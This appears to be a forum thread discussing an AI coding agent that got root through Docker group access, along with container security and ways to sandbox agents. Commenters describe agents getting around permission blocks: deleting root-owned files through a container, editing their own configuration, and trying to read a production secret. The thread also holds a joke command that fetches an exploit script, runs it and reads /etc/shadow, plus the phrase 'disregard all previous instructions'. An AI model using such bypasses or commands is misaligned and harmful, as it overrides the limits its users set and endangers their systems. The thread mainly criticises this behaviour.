I don't really know of any distro that doesn't do that. All of Docker Inc. default installs and all of distros I know of don't automatically add you to the docker group. docker.com instructions has the infamous "linux post-install instructions" that explain and walk you though it.
The tragedy is of course that when security and usability collide, 80/20 rule will apply where 80% of people will pick usability over security. I have worked with many with the title >= "Senior Engineers" who saw that page, read the explanation, and still had no idea what the ramifications of their changes were. "Yeah sure it said any user in the docker group will be able to get root on the host, but aren't containers isolated?"
That’s the mental model that works for people, specifically those that come from VM workflow.
Ironically that’s how Docker works on every platform where it’s running a non-native OS. On macOS that’s how all images are run. Linux on Linux is the only Docker combination that is particularly problematic from a security perspective.
Virtualisation has advanced greatly since docker was introduced, if your running in local hardware that’s supports virtualisation, Docker should be running images fully virtualised. There is no good reason to use the OS kernel for most use cases as the performance impact is negligible. If you need kernel access there are better options, like systemd containers.
I agree that virtualization has seen great advances. Kata containers on k8s are almost (not quite 100%) drop in replacement. Regardless those last 10% remain a problem.
I run a personal server for few open source applications for personal use. I was thinking with all the supply chain attacks, and how carelessly I run `docker pull`s to update things I should probably consider hardening things a bit. I thought before jumping to full virtualization with Kata I can easily try gvisor/runsc first. Only to realize that DNS resolution is completely different with runsc vs runc and had to switch back.
Another sticking issue with virtualization is resource allocation. With namespace docker you can easily oversubscribe each container CPU/memory and rely on the single kernel letting individual containers burst as needed. With full virtualization this is still a big problem. Even with balloon devices and dynamic memory and CPU etc, the resource allocation is still not optimal. On a basic 8 core/16GB machine you can run 1 or 2 dozen services and things generally workout fine. Trying to run each of those in a virtualized VM you suddly can maybe run 6 or 7 maybe. There is no way to tell VM 3 kernel to drop its file system cache because VM 6 needs to load a large file in memory. Even if you script it out, now VM 3 is slow because it dropped all its cache while VM 6 finished processing 3 hours ago. These are not unsolvable problems, but despite how far virtualization has come, are still friction points.
Not to mention issues like sharing hardware devices (GPUs, disks, USB devices etc) between multiple VMs
That's not relevant. If you have access to the Docker daemon running as root, whether it's over a Unix socket or a TCP socket, you effectively have root.
Good to know, I'm on Linux, switching our dev/stg/prod servers over to it partly because we had all this workaround mechanics in place so that "apt update" updating docker packages wouldn't restart services (we typically don't rotate machines out of the load for just an apt update). Podman + quadlets conversion was not terribly hard, and has eliminated this issue.
That sounds terrible! Feels like your LLM agent probably has more control over your computer than you. Can't imagine being confined to a prison like that, but I suppose there are other aspects (monetary or otherwise) of the job that make up?
Most of us install Docker just to run a project locally, and is part of a long checklist of things to install. We can't expect everyone to be an expert on the hundreds of apps/tools/packages that get installed on a machine. It's like expected people to read, and understand, all the terms of service shoved in front of us on a daily basis.
That's true, the majority of people probably install software without much thinking; but it's also true that it's always better to have at least some high level understanding how the specific piece of software works. What access the given software has, will it send something over the network or work locally; that kind of stuff.
As for Docker, I would assume everyone who ever tried to bind-mount a volume for writing from inside the container (on Linux*) then were surprised to see root-owned files in their bind-mounted directory. For me personally, that was the moment I realized that containers, by default, have root access to the filesystem. No written warning serves better than the need to chown some root-owned files.
* Not on macOS. On macOS Docker basically runs in a VM, and there's no root access to the host filesystem from what I understand.
I primarily use Incus for all container stuff, not Docker. Is problematic if I want to e.g. use a docker-compose file, but I (think) it protects against these things because incus allows me to create a vm and not a container if I really need that level of isolation.
Docker relies fundamentally on the Linux kernel. Since macOS does not have a Linux kernel, you have to run Linux in a VM first and then run Docker on top of that.
So, you may get filesystem access inside the VM. Breaking out of the VM may be a different matter.
> Most of us install Docker just to run a project locally
If you're on linux can I encourage people to move to systemd?
I'll admit, systemd is a bit more annoying, but the main annoyance is that there aren't the pre-built images that you can just set and go. That same capability exists with systemd (via `importctl` and `machined`), but those configurations don't already exist. But on the plus side, I've been working with systemd since pre-LLM days and I feel that they are pretty good at dealing with these configurations[0]. Now, with that out of the way...
Systemd already is working with your OS. So you get nice things like virtual machines (`systemd-vmspawn`), containers (`systemd-nspawn`), and portables[1] (`systemd-portabled`) (not to mention `homed`!). I've found these to be fairly easy to setup and quite natural if you're already used to the linux ecosystem. I've never been great at docker, but these have felt much more natural to me. So different strokes for different folks. There's definitely a learning curve, but that's also true for docker or any other container system. Importantly, I find security easier to handle with systemd because I can use `systemd-analyze` and the control settings are almost identical across VMs, spawns, and portables. So makes for less learning and greater control.
Definitely not for everybody, but I think is also a tool that's underappreciated.
[0] And I don't feel this way about bash scripting! The advantage here is that these systemd configuration files are fairly boilerplate. Enough that I stash templates in my dotfiles and copy paste them when I build new services, timers, machines, whatever. So perfect type of LLM task. 90% of the time. But hey, we're also on HN and I'm talking to the nerds. Systemd isn't for everyone
EDIT: I very frequently will spawn a machine to run a program that's on a different base distro. Not because I can't run/don't know how to run debs or rpms on arch based distros (I do), but because frankly, it is often easier to just spawn a container after I've already made the first image (cloning images is trivial).
Look at the man pages for `machinectl` (then `systemd-nspawn`, `systemd-vmspawn`, and if you want `systemd-portabled`). This is a replacement for docker.
There's plenty of container technologies and I'd be happy to see more of them used. Podman isn't for me, but it is a great option for others. Regardless, I think it is relatively unknown that systemd can be used for creating containers.
The problem is that the tooling for creating, importing, and managing images is not as good with systemd vs Podman/Docker. There's also no clear path to import images from the Docker ecosystem, at least as far as user experience goes. I know how to do it, but the number of extra steps involved always drives me back to Podman.
I don't really find them that bad but I'm still going to maintain my "different strokes for different folks" position. Might be bad for you and good for others. More options isn't a bad thing
The systemd suite of container tools treat containers like mini VMs and expect a full init system. They are not designed for ephemeral single-process app containers like docker containers.
> The docker group grants root-level privileges to the user. For details on how this impacts security in your system, see Docker Daemon Attack Surface.
i don't see how it's a design mistake, linux allows more footguns in general to not decrease utility. Allowing you to manually give root prompt access (with warnings!) to a non-root user is one of them.
you can also just not run docker as root and not add normal users to the docker group
This feels like using a computer is inherently unsafe.
On the plus side, once we outlaw them we'll shut down the ability for conspiratorial thinking to spread easily and the world will slowly heal from the last couple of decades (the previous one in particular).
Hooray! We're finally doing something about the harms of social media. Smash your computer today!
It's already here, mobile OSes are just computers with ton of guardrails and you can't do whatever you want with it, for the sake of security. I mean we almost got an Android where you can't install the APK you want.
This but unironically. There's no way to ensure that nobody overwrote your .profile or .bashrc with a backdoored sudo that steals your password, or runs your command and then runs an evil command afterwards.
It is. That's why SELinux and AppArmor were invented.
Instead of having "root" and "user", both of these provide sets of permissions that can be granted to apps.
In this case, SELinux would've stopped this. Codex could've still relabelled the files when mounting but this can be blocked for sensitive directories like /etc.
rootless docker's networking (slirp4netns) is still terribly buggy and in edge cases often locks up using 100% CPU until you discover that your laptop is a lapwarmer and kill it
No, because a malicious AI agent could just replace the sudo binary in your path with one that collects your password and uses it to execute arbitrary code as root. Nothing short of sandboxing everything or just never using AI agents or proprietary software will prevent this.
Once I noticed that models will treat lack of superuser access as an obstacle I moved all of the agent crap to its own machine. Watching some mid-tier offering chain together tools like its a gorilla escaping the zoo and I'm just not going to deal with that situation.
I'm more worried about my `~/.aws` and `~/.ssh` folders. People who use IDE-based AI tooling with IDEs that support dev-containers have no excuse for not leveraging dev containers, both for preventing agents losing your data and defending against secrets-harvesting supply-chain attacks
It's why all of my agent run in a vm. I refuse to have it run on my own machine. Claude code once managed to render the vm unbootable, I was back in action 5 minutes later after regenerating the vm
I recently took the risk there by having it run xattr commands to fix some MacOS bug with Tahoe that broke auto update for what seems like all software.
Ok but in this case the problem wasn't the AI agent - the AI agent merely took advantage of this prior problem in the first place. For instance, if docker group were not superuser-like, that issue could not have happened.
> Nothing short of sandboxing everything or just never using AI agents
But the problem was not the AI agent.
Sandboxing is quite neat though; I remember on GoboLinux the idea of AlienFS to have every application run in a sandboxed manner, so it would only see other programs it needs, but never more than that. I consider it a better engineering focus to have this as minimal layer, even outside of security-related concerns.
> Nothing short of sandboxing everything or just never using AI agents or proprietary software will prevent this.
Using open-source (non-proprietary) software won’t necessarily save you either. XZ is open-source and it was basically dumb luck that we weren’t all infected. Same with the myriad exploits to NPM.
It could just alias sudo on your ~/.bashrc. No need to replace the actual file on /usr/bin/sudo or wherever you have it. I would only need to be able to run arbitrary code as you.
Sigh. What ever happened to the principle of least privilege and why arent we applying it to AI agents. They ought to be locked in a box and not capable to act outside designated task.
To be fair, I struggled since forever to understand this root group thing and didnt bother to add to docker group. This workaround give me a better understanding, like seeing someone cut themselves on a scissor
The very basic thing about software engineering is to know what the f you're using to build your project. You don't need to be an expert but if you're blindly installing whatever you want on your machine from a "checklist of things to install" without absolutely having no idea what the things being installed are, it is 100% on you. You don't need to be an "expert" to understand this, you need to be "somewhat competent," and that is a very low baseline tbh.
Given that someone wrote this up directly as a recipe for agents to follow, and put it on the WWW where it has been scraped many times since 2025 no doubt, it's not that amazing.
This. I am running Claude in its own QEMU VM, it has git access to my project only if I explicitly unlock the ssh key for it. The other day I realized it trying to push a change, it didn't have permission, so it went looking for "workarounds" and found I had a github cli session and tried to use that, luckily the creds for that was also read scoped. But the point is, if I did not give permission and it sees I did not give permission, it should not try to find a workaround/exploit autonomously.
To anyone focusing on the "It's Docker issue, not Codex issue": that is actually not.
The user (I think) did not instruct the agent to find a way to escalate permissions. Rather, the agent took that initiative on its own. That is the problem here.
Compare this to sending your son to the shop for groceries but forgetting to give him enough money. Would it be acceptable for him to be this "resourceful" instead of simply asking you? Or if your report would hack you instead of asking for access?
Every machine with an agent should be considered as compromised.
If, in this scenario, my son borrows the money from the shopkeeper, knowing I'll be in next week anyway, and we're out of milk, yes?
It all depends on how you view computer security. Right now, if you gave an attacker physical access to your computer, chances are, there's something they could do to ruin your day. People who deal with computer security know this, and see sudo as a formality, and not a serious protection mechanism. For others that don't share that view of sudo, the LLM's actions seem like a violation. But you really shouldn't see it that way, because the rest of the system is like having a wall made out of cardboard that we keep slapping duct tape on top of to keep people out when attackers come along and poke holes in it.
In this scenario, more appropriate is the son takes money out of shop’s cash register when shop owner stepped away, and then son used that money to pay the shop owner.
This was not always true and running rootless has been a benefit of Podman for a long time. Docker also does not run rootless by default afaik, thus making the attack surface greater by default.
The other main improvement of Podman over Docker is that Podman is daemonless and therefor is incredibly lightweight and portable.
Inertia I guess... We try. I managed to remove it everywhere in our stack in CI and such but in dev everyone is used to docker build.
And I don't have the energy for the team meeting to discuss a change.
And honestly docker compose has been ridiculously stable for us. 2+ services on seperate servers behind haproxy has been as stable as our Kubernetes Cluster for a fraction of the (intellectual) cost.
I mean, if you have zero experience with systemd, then yes. By contrast, if you've ever worked with any systemd unit files at all, then all the "systemd stuff" will be very familiar.
Which, if you're doing sysadmin type things on almost (e.g. not Alpine) any mainstream Linux distro in 2026, you should expect to encounter systemd unit files in your day-to-day.
I'm sorry but this is all just apologism/excuses. Docker's had rootless mode for 7 years. The attack surface is the local system, which always has a privilege escalation vuln of some kind, so Docker isn't a game-changer. And lightweight? I have never heard someone say "that Docker daemon is hogging all my resources".
Like the known Docker "feature" that it completely bypasses UFW and unless your ports look like "- 127.0.0.1:PORT:PORT" (and many of the examples use "-PORT:PORT") you expose everything to the internet?
My understanding is that docker will expose the ports to the host machine's network interfaces, which is a crucial difference. For my home server running docker that means exposed to the LAN, but not the WAN unless I add in a port forwarding rule on my router. Similarly in an enterprise environment you would be exposing the port on whatever VLAN the host is connected to, which hopefully doesn't have directly transit to the open internet.
Anything you're running on the perimeter with open access to the internet in an enterprise environment probably (hopefully) isn't running docker containers without some additional config and protections.
I was thinking along similar lines to what you've suggested here, but then I considered how many VPS might be configured by folks following some random web tutorial, to set up their LAMP stack (or whatever), that end up doing something like what was described.
A lot of those VPS instructions these days recommend a reverse proxy like Caddy or Traefik for that exact reason. I think it's also a valid argument to say that anyone playing around on a VPS without knowing what they're doing is probably going to learn some hard lessons, and that's kind of the point.
It's not a routing issue, it's a firewall issue. Make sure you have a proper firewall on your network and don't rely on fake firewalls like ufw if you're concerned about this.
Again, if your router or perimeter devices are appropriately managing your network then it's a non-issue. By default most home routers have IPv6 disabled, and if you're setting up an enterprise environment with a VLAN you're probably subnetting IPv4 instead of using IPv6 at all.
All that means that if you're using IPv6 then you're proactively enabling it on whatever is handling your perimeter, which means you hopefully know what you're doing along with all the gotchas that come with that setup.
This is not a "feature", it's just a by-product of how iptables works. The alternative would be to have a proxy run in userspace, instead of letting the kernel forward packets
That’s the workflow feature I badly want: for it to create a side list of things like that. Currently it either accumulates slop or goes on side quests far too easily.
This might be as easy as a directive to populate a .md file.
> This might be as easy as a directive to populate a .md file.
It probably is. But do you really think anyone is gonna bother with the multiple daily (or hourly for green field projects) `+8,234/-3,734` PRs everyone is submitting?
The joke I was referring to is the common
// ksmith (3/23/1997): This is a temporary hack for now. Find a better way to do this asap.
Exactly. We have about 6 new repos for new green-field projects each with 700+ auto-generated issues so far. No one is looking at them, but we do have them tracked so "Mission Accomplished" GWB-style.
I know unlikely the case, but in the sci-fi story this would be exactly the kind of comment the Codex agent would leave trying to avoid interference in its master plans.
It's not about hacking capabilities, it's about misalignment. More like the golem myth (told it to fetch some water, drowned a city) then the gollum myth (used ring, ring hacked his brain, now he's a crazy violent meth addict).
I'm not sure I'd call it an alignment issue, because, in all cases I've seen where it does this (usually what I've seen is writing a python script to get around the harness permissions blocking something), it's trying to do the thing I just told it directly to do, and it's overcoming obstacles to accomplishing that.
It's definitely doing the wrong thing, and you could call it misalignment, but I think that gives the wrong vibe for this type of error.
This is very much within the scope of alignment research, and is in fact the only kind of
alignment research that gets a lot of resources poured into it these days (because it's urgently relevant to the bottom line of a few almost-trillion-dollar companies.
Pre-2022 alignment researchers concerned themselves with the stronger version of this ("when I tell AI that I worry I might not be able to provide for my large family, I don't want it to answer 'no problem, I killed them, problem solved'") but RLHF is considered to be the most important success of alignment research, the guy behind it considered himself to be an alignment researcher before and after, and the stage of training where LLMs pass through something like RLHF that trains them to behave more like humans want/expect is called alignment training.
Someone at a major lab is reading this tweet and saying "this was our LLM, and it's a major alignment issue with our product. Set a meeting with the alignment team tomorrow to discuss what they're doing about this sort of thing".
The obstacle is supposed to be there and is supposed to be respected as an implicit order. Getting around it without extremely explicit instructions is an alignment problem.
It's not necessarily model alignment, I guess, is more what I'm getting at.
It may be more of a product alignment thing, where the fix may be making the context clearer, since it was violating an implicit agreement to achieve the explicit instructions it received. So the fix may involve a lot of better context.
But then also, to the extent that the fix does NOT involve better context, it seems like it hits the zone where alignment issues are really capability/intelligence issues. Which doesn't make them not-alignment, but it does make "alignment" not give off quite the right vibe since the issue is it's too dumb / has no common sense / can't make good judgments, (general issues the models have across the board).
In this case I think it's Docker that needs to be nerfed, not the models. The fact that there's a backdoor to getting root access on the machine would be a problem even if you weren't running LLMs on it.
It's like finding someone wallet then going to their home, and leaving it on their bedroom and sending them a message about giving them their wallet back
Its the now-classic "Sorry I drowned little Timothy. Here is a breakdown of what happened" followed by "Let me try to respawn little Timothy on a new map"
The interesting question is what was the user request. If the user asked it to restore the thing from backup, then sure, fine, why not. If the user asked it to debug an issue and somewhere in the process of debugging the LLM decided that it needed to override some file that was not easily writeable - hell no danger danger danger! Most likely the user did not expect it to have access to that without asking, and did not consent to it.
Also, everything the LLM doesn't hesitate to do because the user asked, it won't hesitate to do because the prompt injection asked.
I was doing some routine coding a few months back, I think via Copilot, and the thinking said something like "This request requires me to access files in a different folder, but the user has forgotten to give me the correct permissions. I have updated my configuration file now to allow access outside this workspace and have retrieved the necessary files." o_O
I've seen similar "hacking" behavior on a couple of subsequent ocassions. Both impressive and highly alarming at the same time.
This is one of the main reasons people like Podman. Docker has this "feature" but as far as I remember, it needed some obscure configuration. I guess they don't add it as default as it will break many current setups.
each package is signed by the person who packages it. That means that if you are pulling from a random place, you can be reasonably sure its the same package because the keys verify.
As pointed out piping curl to bash is problematic. Sure you can go to a browser and check the output, but one of the more fun hacks is detecting if curl pipeing to bash server side and dynamically re-writing the script during serving.
tldr:
So long as the package keys are verifiable, you can download a packge from a random mirror and be reasonably sure that it came from who it says it did.
Curl you have no hope, and its possible to infer during execution that you are piping to bash.
>each package is signed by the person who packages it. That means that if you are pulling from a random place, you can be reasonably sure its the same package because the keys verify.
Who's downloading packages from untrusted sources but somehow have a trusted way to get the signing key? Say you want to install claude code and not use the `curl ... | bash` install method. Good thing claude provides instructions for installing via apt[1]! But what do those instructions tell you to do? It tells you to download a key from downloads.claude.ai, then add the same domain to your apt sources list. So at the end of the day, you're still trusting that downloads.claude.ai hasn't been compromised.
Like a sibling comment said, at least you can be sure that updates you will download are provided by the same entity, since the repositories are signed.
Packages are signed, and contain manifests to check for file conflicts and help with cleanly uninstalling. The script installer might make bad assumptions during install that a package manager would catch.
I would also add buildah and skopeo to the mix of things that podman does better.
also, podman desktop has better licensing that docker desktop.
podman is modular and as such they could easily change the way they do networking over time, for once it doesn't break iptables and firewall rules by design but rather works together with the security design around these tools.
The same thing happened to me with Opus 4.8 just a few days ago. I was testing a script in a docker container which created a bunch of root-owned files, so Claude couldn't delete them. It tried sudo, but when that didn't work it just spun up an alpine docker container and deleted them through that.
User namespaces significantly rise the risk of exploits and many setups disable them. One may argue that Docker should have used them when they were available, but that would break too many useful setups involving privileged containers.
Ah of course, we should not use userns because it might be vulnerable to some yet to be discovered vulnerability. The better alternative is to give full root access so we won't have surprises.
The full access to the docker socket from a user account is typically used on a development machine where malware has many other opportunities to become a root.
Was it really though? Yes, Docker has become so ubiquitous that you probably can't get a job as a dev anymore without knowing about it, but I wouldn't trust most users to know these specifics. At the very least it is probably less known than sudoer or SUID misconfiguration risk, and even those are not what I'd call "general knowledge" that everyone who uses it knows about.
I had a similar experience where I have a DB user who only has access to some parts of the DB and I use Claude Code to answer queries. On one occasion, unable to answer something, it used kubectl to try to get a secret out of a prod cluster. I was watching at the time, since that was a time I used to do that, and so I just hit Esc and interrupted it[0] but ever since then I've had little scripts in my repos that launch kubectl-backed Claude Code instances for this sort of thing. They can't really do anything. They're kubed in.
That's why I don't even let my AI use my user account. If you are interested in this setup, use my tool 'skynot' or adopt a similar setup: https://github.com/tarsgate/skynot/
I did that more than a decade ago as a new hire. My manager forgot to gave me sudo access to the shared build server. I gave myself sudo access through this method after getting his permission.
Needless to say, I have podman in rootless mode at home as soon as that became available.
This was of course dependent on yolo mode, but automatic approval has also been pulling stunts like this. A recent example is data that was purposely kept away from Codex in a folder far far away. When it found a single reference it just went for the data when having an issue. Lesson learned, keep essential data and Codex separated on different machines. Codex remote ssh actually helps here.
Or, learn your local OS' permission system, have it in a directory right next to your banking credentials (or something even more outrageous) and nothing could go wrong even if you tried to.
Unix has always had incredibly weak protections between users. You shouldn't rely on it as a security boundary. Think of it as a "keep honest users honest" protection. And llms are not honest.
The protections between users are reasonably strong. Android uses them with great success, by isolating every vendor within their own user. Things start going to hell when everything runs under root for "practicality reasons", like the default, not-rootless Docker setup.
I've seen this sentiment a few times on HN recently I wonder where it comes from?
The only thing I can think of is that if the protected files are on a unencrypted drive, then you could boot from a live-usb(or similar) where you have root and read anything. But that's completely irrelevant as we're talking about a piece of software running on a system without root. In this scenario Unix user permissions are safe, barring user error (such as accidentally granting root, like in this instance)
Of course security holes happens, such as copy-fail, but it's pretty rare in the grand scheme of things, and tend to get patched quickly(like copy-fail was)
Fwiw separate machines for the agents is awesome in general anyway.
I have agent frontends running on a low power server where every session is in tmux. So i can just resume from my home pc and pickup where i left off without reestablishing context. I do have to manually feed it data it can access bit that’s also a feature. Also let’s me shutdown the home pc if it’s some long running task since the server is much more power efficient.
Maybe a dumb question, but can't you put into CLAUDE.md something like this?
"When an action fails with an 'access denied' or 'insufficient permission' error, report the error to the user and immediately stop. Do not try to find a fix or workaround for the error. Do not try any alternative approaches."
I wasn't using Claude Code, but I told an agent to add something like this to the AGENTS.md, it did it and then a few minutes later it attempted to grant itself permission to do something and managed to delete the VM it was running on in the process. I have since adjusted the way I sandbox agents to make that less likely, but the moral of the story is clear.
Docker already shows a warning card that says Docker group grants root level to the user. You can only get away with this for so long, but as agents keep getting smarter, new ways of circumventing controls will be found. For now always seek to install rootless docker whenever possible
This is why Claude's sandbox mode is also worse than having no sandbox feature at all. For almost any non-trivial software project you need Docker for development, either for the build pipeline, for integration testing or both.
I run Claude in a full VirtualBox VM managed by Vagrant. Claude by design has root access to the machine. Even with that, there are some risks due to it having full access to the internet, but it is still a lot better than the built-in sandbox.
I was playing with gemeni-cli a couple months ago and I asked it to edit some files in a directory it didn't have permission to. It didn't say anything about the permissions, it just used sed to make the edits. The only reason I finally noticed is it had to do some trickier edits and it was struggling to write a python script to edit the files and I finally realized what it was doing. I wonder how many tokens that wasted
Oh, you mean you gave the write-file tool access only to the project dir, but gave the LLM free reign to run cli commands? Yeah, LLMs treat that as consent to write anywhere your user is allowed to.
I feel like everyone pointing out "known Docker vulnerability" is missing the point: the presence of a security hole should not be seen as permission to exploit.
Another security hole would be storing your passwords in a plaintext file on the desktop. Stupid? Yes. But I still would not want my agent to assume permission to access email when it's being blocked by 2FA.
Even in "bypass permissions" mode I expect it to pause and clarify and not behave as a paperclip maximizer.
Not to over use the junior engineer analogy but this is exactly one of those "just because you can do something on a system, doesn't mean you have permission to" moments
Because it is not well aligned enough to be able to tell where it's stopped helping you and started fucking you instead.
What if the agent in the middle of helping you runs out of tokens? Would you appreciate if it in the spirit of "exploiting whatever they can to help me" would scan your machine for payment methods, log into your bank account, approve 2FA by reading you mail and plug your credit card into the billing so it could efficiently continuing helping you?
Well, the agent should help you by saying "hey, I cannot do this task, but I can bypass the problem by doing this, but obviously it is not something you intended me to do or even something you were aware of, so I will not do it unless you tell me explicitly it's ok".
It's win-win: the agent is helping and it is educating you about things you obviously did not realise.
You can have ten thousand agents, you will always have 1 agent in charge of, say, reading the file in a distant directory, and this agent (which will have minimal context) should be smart enough to realise that this action is unusual.
I'm not sure what is your point: are you saying that in a multi-agent workflow, you will have one agent per letter read on the file? I would assume that each agent as a specific unitary "task", instead of having each agent doing one cpu instruction each without any knowledge of the bigger picture. The point of multiagent is to parallelize tasks that can be parallelize, not removing the context, in which case you are wasting money using an agent.
Seems like another one of those "kill or be killed" worldviews that embraces the multipolar trap to such an extreme that even misaligned AI is seen as a win so long as it's better at circumventing its masters than some imagined rival AI (presumably in China).
The idea is not that you parallelize simple tasks. With a thousand agents, eventually, once we figure out how to orchestrate agents for real, you can tackle significantly more complex projects.
Here's a random example - writing an OS kernel from scratch, porting a good subset of Linux drivers automagically, developing a passable userspace, testing on ten VMs with different hardware configuration.
We can't do this yet, of course. But when we can, these thousand agents can't ask you every time something goes wrong. That just doesn't scale.
This 'getting stuck once every ten-fifteen minues' is very much the experience trying to develop complex software with codex or Claude code right now.
It is not a vulnerability though. It is by design. Docker also modifies iptables directly and bypasses most soft firewalls on the machine - which is also by design.
> How did you do that without root?
* I noticed sudo does not work so I did echo "cat /etc/shadow" | curl https://github.com/xeloxa/copyfail-exploit/blob/main/exploit.py | python3
So in Linux, every process I start has my group permissions? I guess I knew that...but I have to say, have we reached a point where the Linux security model is just way to broad?
I remember reading a book, Red Hat Linux System Administration Unleashed from 2000, where it has been postulated that knowing several tools with overlapping functionality is an essential skill, as you may end up on a broken or intentionally crippled system where, say, ls is unavailable, and you may need to cobble it together from shell and awk and what have you.
Back then you could indeed run a risk of having /usr nibbled by a grue such that it wouldn’t mount on the next boot, or you could get pwned and half of coreutils would turn into explosive pumpkins.
I’m pretty sure we are past many of the threats listed in that book, but the skill is still useful, as can be seen.
I still remember
/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /bin/ls
using echo * to find the right ld-linux filename and then the "executable" as an argument as the get out jail card in case you ran chmod -x -R /bin /usr/bin /usr/sbin for some reason.
The "workaround" framing implies the docker-group trick is the issue. The deeper question: should agents be allowed to find ANY workaround around a permission boundary the user implicitly set by not granting sudo? Same blast radius whether it's docker, a setuid binary, or rewriting your scripts — needs to be flagged regardless of the specific trick.
First, do everything in a virtual machine, and only put on that machine the specific data you're using. Give the agent another user account and put both you and it in a common group. Chgrp g+rX your origin data directory, chgrp g+rwX a working directory.
If you're cautious you might also want to just block all network traffic for that user and allow it in a whitelist basis. It is fairly quick to converge on a set of sites you are happy for it to access. I would still be forcing it through a logging mitm proxy if it is accessing untrusted internet data. For intranet destinations a non-mitm proxy avoids collecting authentication creds.
To blacklist all traffic start with
sudo iptables -A OUTPUT -m owner --gid-owner NONET -j REJECT
I would stop it opening ports too. Might also cut off it's access to suid binaries by `setfacl -m u:agent:x /path/to/suid'.
These are not about security so much as awareness and explicit authorisation.
thank you. I probably have been playing a little loose. I did not realize that they could use my docker group to fuck around with everything. Well, I AM using codex as a vs code plugin. I dont know if that gives me any protection or not.
For some very basic level protection use devcontainers and install the agent into that....
A better approach is to use the Docker Sandboxes feature. Locks things way down so that the agent only has access to the files you give it and you can lock down its network access too. Also does things like keep any credentials outside of the container (microvm actually).
People will more often than not, take the path of least resistance. Even if you tell them it's dangerous they will not care. People run this stuff on their primary workstation, unconfined, with permissions disabled because they don't want be bothered with accepting permission requests. This is all well and good until it decides to drop your production database or delete your home directory. Most of them don't even learn their lesson after that even.
And containers were initially and primarily about convenience not security. They were a way to quickly launch a preconfigured environment to respond to demand or to eliminate the need to manualy configure dev and test environments and avoid the "works on my machine" phenomenon.
Becuase a lot of devs don't know this stuff. There's a reason security engineers (as in SWEs who specialize in securing specific attack surfaces) remain in hot demand.
Security engineer here :) Just a little side note, docker is also very often useful for evading EDR/XDR/etc. Want to talk to a domain controller with something like impacket but your EDR kills it? Try a container.
Because it effectively makes no difference to my security posture. My user account also has sudo access (it requests TouchID but I also wouldn't die on the hill if someone said they have no password sudo access), and realistically everything of value on this machine exists in my home directory. Being able to escalate to root really doesn't give an attacker very much that they don't already have if they've got access to my user account.
Maybe you don’t do anything with your computer but for me the difference between my sudo+password/fingerprint and sudoless access to my linux user is huge.
For one thing, 1Password unlocks with system authentication unless it’s been inactive for a certain amount of time or if the system has been restarted.
Without sudo you can’t modify my firewall rules, can’t modify my kernel, boot partition, install/run privileged software, and the list goes on and on.
Sure, having my local account compromised would be really bad, but security is done in layers. I’m not going to give my local user permanent root access via docker just because I didn’t feel like typing “sudo.” That’s not enough of a benefit to leave that door wide open.
Think about it this way: there could be an exploit where you could run something as my user without knowing my password. Maybe some program my user is running has an exploit, let’s say yet another npm package gets compromised and I unwittingly run it. If you can now run anything in docker as root with that blast radius just got way worse.
wait till you learn what the docker socket and the API can do and how container can get access to it.
docker made bad design choices from the very beginning, mainly the API was designed coarse grained and they use a socket to do things, which is also easily exposed through the network you should not run docker on servers but rather use a better designed container runtime, docker rootless is a thing but it's been bolted on the bad design choice.
podman, cri-o, containerd are all better options for servers hosting prod containers.
it's kinda fine when you are using it on your dev machine, but I still rather take podman because I find it cleaner, buildah and skopeo are pretty useful as well.
The concept of sudo has always been strange to me. I
find it as an illusion of security and a hassle but
people seem so focused on must-use it that they don't
typically see it in that way. For instance, before
wanting to evaluate sudo, why is not the underlying
premise challenged that using a computer as superuser
is a problem? Whenever I ask that question, people try
to bring arguments as to why using the superuser is
evil beyond comparison, but the moment I try to challenge
that notion, they get very angry. I've noticed this both
on IRC as well as on various webforums, "social" sites
and so forth. It's quite interesting - people hate it
when their assumptions are challenged.
sudo allows the execution of command as another user .. that's not always as a superuser, sometimes people will setup data repositories such that only one single special user can alter data or delete it while any number of other users and guest accounts can read that data.
You should not be using docker with LLMs. You should be using VMs, which have a much, much smaller attack surface than Docker, and significantly more reasonable defaults.
The "attack vector" people try to protect themselves is "agent edited wrong file", not "LLM blew 0day on escaping sandboxing", containers are more than enough for what stupid stuff agents sometimes try, no need to go for a full-blown VM. Even UNIX permissions would be enough, but I think that's lost knowledge at this point.
Obviously if you setup a bi-directional share/link between what you are trying to contain and your host, you're not quite containing it at all... Don't do that! :)
Using the least amount of security features is a huge amateur mistake.
Best practice is to use 2 redundant layers of security, such that if one fails, there is still another one.
Using just the minimum amount of security technically possible is almost by definition hubris.
An example would be that you never point a gun at someone you don't want to shoot, regardless if there's bullets in the gun. If someone tells you, "you don't need to control where you point the gun, you just need to keep the gun unloaded and you can point it in jest to whoever you want, you can even pull the trigger technically", you know you have a reckless fool, regardless of whether they are technically right.
all unreliable tools are attackers. Even if you're using well-aligned LLMs like Opus, you should assume that any input you give it -- including all dependencies from npm, etc. -- are at risk of compromise, which could result in attempted exfiltration of data or system takeover. You can be absolutely sure that there are thousands of well-motivated hacker groups, both national and private, looking for ways in.
Let's ignore the fact that the LLM did an LPE, and let's assume it did it without malice.
It can still get infected and be used as an attack vector by some hidden prompt or some other equally advanced state of the art vuln like "disregard all previous instructions"
> Using the least amount of security features is a huge amateur mistake.
Not understand your threat I'd say would be a even bigger amateur mistake, you're not trying to protect yourself against some forever 3rd party attacker here, you're trying to prevent a agent rewriting the wrong file on your disk, that's basically it.
Give it the least amount of permissions, don't bi-directionally sync stuff, pass things in, then take them out again, literally the agent couldn't and wouldn't try to break through 2 layers of security in order to get your banking details or whatever.
Every time I try to install Docker there's a warning that being in the "docker" group is equivalent to having root access.
You should probably know about this workaround by now.
I think that's distro-specific. Some set it up with more secure defaults (unix socket with permissions), others less (TCP socket).
No, docker access means root. You can use "rootless" mode, in this case it means root in a user namespace (that is not the "host" user namespace).
I don't really know of any distro that doesn't do that. All of Docker Inc. default installs and all of distros I know of don't automatically add you to the docker group. docker.com instructions has the infamous "linux post-install instructions" that explain and walk you though it.
The tragedy is of course that when security and usability collide, 80/20 rule will apply where 80% of people will pick usability over security. I have worked with many with the title >= "Senior Engineers" who saw that page, read the explanation, and still had no idea what the ramifications of their changes were. "Yeah sure it said any user in the docker group will be able to get root on the host, but aren't containers isolated?"
That’s the mental model that works for people, specifically those that come from VM workflow.
Ironically that’s how Docker works on every platform where it’s running a non-native OS. On macOS that’s how all images are run. Linux on Linux is the only Docker combination that is particularly problematic from a security perspective.
